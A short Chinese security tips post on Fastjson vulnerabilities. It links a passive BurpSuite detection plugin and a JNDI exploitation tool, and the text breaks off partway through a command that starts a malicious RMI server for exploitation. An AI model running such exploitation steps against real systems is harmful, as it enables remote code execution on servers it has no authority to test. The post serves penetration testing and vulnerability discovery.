每次看到json数据包,都难免会想起Fastjson以及它多个版本存在的漏洞。
如何实现自动化检测以及简化攻击步骤,从而提升漏洞发现能力,让你更有效率的Tips,在这里和大家分享下。
01、自动化漏洞检测
一款基于BurpSuite的被动式FastJson检测插件,这个插件会对BurpSuite传进来的带有json数据的请求包进行检测。
Github项目地址:
https://github.com/pmiaowu/BurpFastJsonScan
02、简化攻击步骤
在这里我们可以使用一款JNDI服务利用工具,来简化fastjson漏洞检测的步骤,辅助漏洞利用和渗透。
Github项目地址:
https://github.com/wyzxxz/jndi_tool
Fstjson漏洞利用:
(1)开启RMI服务
java -cp jndi_tool.jar jndi.EvilRMISe